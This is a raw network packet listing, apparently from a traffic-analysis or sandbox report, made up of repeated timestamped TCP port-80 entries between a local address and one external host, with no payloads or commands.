                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295346975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295356989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295384884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295394897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295403004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295403004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295404911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295417070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295428991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295432091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295443058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295453072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295464039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295465946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295465946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295474052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295484066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295495033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295505047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295516014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295526981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295531034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295531034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295531034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295536995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295548916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295552969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.295615911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331639051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331650972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331665039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331676006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331692934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331708908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331712008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331717968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331729889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331752062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331763029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331773043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331783056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331788063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331788063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331881046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331890106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331898928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331912041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331945896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331948996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331948996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331957102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.331965923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.332137108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.332144976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.332160950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.332160950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.332176924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.332187891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.332196951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.332220078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.332220078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334394932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334403992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334413052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334444046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334451914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334455013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334465027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334510088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334511042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334605932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334616899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334625006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334635973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334647894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334661007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334661007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334669113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334685087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334696054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334705114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334714890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334724903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334726095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334727049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334736109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334744930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334754944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334768057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334780931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334794998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334804058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334815025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334825039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334829092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334829092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334881067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334891081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334901094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334903002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334903002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334911108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334922075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334927082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334954023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334963083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334970951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334981918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334985971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.334990978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.335000038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.335006952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.335020065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.335035086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364139080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364151955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364168882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364173889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364181995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364191055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364200115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364222050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364259005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364259958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364283085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364291906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364300013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364308119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364316940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364326954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364331007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364336967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364347935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364356995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364453077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364461899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364470005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364479065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364486933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364497900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364509106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364517927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364545107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364545107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364573956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364583015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364590883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364598036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364607096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364615917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364625931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364634991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364639997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.364660025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.365453005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370002985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370012999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370018959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370066881 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370068073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370076895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370100975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370115042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370126009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370131969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370136976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370166063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370176077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370184898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370192051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370192051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370193958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370266914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370266914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370584011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370594025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370603085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370611906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370665073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.370665073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.391375065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.391417980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.391426086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.391431093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.391483068 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392070055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392077923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392152071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392160892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392168999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392174006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392183065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392203093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392213106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392224073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392224073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392246008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392256975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392281055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392303944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392313957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392322063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392332077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392339945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392378092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.392378092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399147987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399213076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399302006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399308920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399322987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399348021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399358988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399493933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399497032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399533033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399540901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399622917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399631023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399631977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399641991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399684906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399684906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.399995089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400029898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400038004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400108099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400116920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400125027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400172949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400172949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400336981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400356054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400363922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400372028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400381088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400388956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400398970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400428057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400435925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400444031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400450945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400450945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400451899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400460005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400469065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400476933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400476933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400492907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400506020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400506020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400506973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400513887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400521994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400528908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400538921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400546074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400553942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400558949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400559902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400559902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400588036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400595903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400602102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400610924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400610924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400614977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400624037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400652885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400652885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400953054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400963068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400969982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400979042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400986910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.400995016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401000977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401026011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401040077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401046991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401048899 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401048899 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401061058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401070118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401077032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401082039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401082993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.401096106 CET804973342.96.10.8192.168.2.4
